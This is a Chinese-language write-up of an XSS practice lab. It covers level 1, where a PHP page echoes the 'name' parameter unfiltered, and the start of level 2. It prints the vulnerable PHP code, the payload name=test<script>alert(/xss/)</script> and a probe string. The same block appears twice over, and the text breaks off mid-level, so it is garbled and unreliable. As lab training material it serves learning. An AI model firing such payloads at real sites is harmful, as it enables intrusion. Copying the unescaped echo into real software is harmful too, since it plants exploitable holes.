xss write up
author:reborn
Level 1(无任何过滤)
【前期分析】
点击图片进入了 level 1,提示我们这关很 easy。这个关没有输入框。
从 URL:http://ip/xss/level1.php?name=test 猜想参数 name 是有注入的。
【代码分析】
网页源代码:
<h2 align=center>欢迎用户 test</h2>
函数源代码:
<?php
ini_set("display_errors", 0);
$str = $_GET["name"];
echo "<h2 align=center>欢迎用户".$str."</h2>";
?>
没有做任何的过滤。
【最终 payload】
name=test<script>alert(/xss/)</script>
过关!
Level 2(闭合标签)
【前期分析】
来到了 level 2,这个页面 URL 的参数是 keyword,我们发现 test 出现在两个位置上,一是标题输入框中。提示我们要 Keep Calm And Try Harder。
先构造一个测试 payload:
'';!--"<XSS>=&{()}
【代码分析】
author:reborn
Level 1(无任何过滤)
【前期分析】
点击图片进入了 level 1,提示我们这关很 easy。这个关没有输入框。
从 URL:http://ip/xss/level1.php?name=test 猜想参数 name 是有注入的。
【代码分析】
网页源代码:
<h2 align=center>欢迎用户 test</h2>
函数源代码:
<?php
ini_set("display_errors", 0);
$str = $_GET["name"];
echo "<h2 align=center>欢迎用户".$str."</h2>";
?>
没有做任何的过滤。
【最终 payload】
name=test<script>alert(/xss/)</script>
过关!
Level 2(闭合标签)
【前期分析】
来到了 level 2,这个页面 URL 的参数是 keyword,我们发现 test 出现在两个位置上,一是标题输入框中。提示我们要 Keep Calm And Try Harder。
先构造一个测试 payload:
'';!--"<XSS>=&{()}
【代码分析】
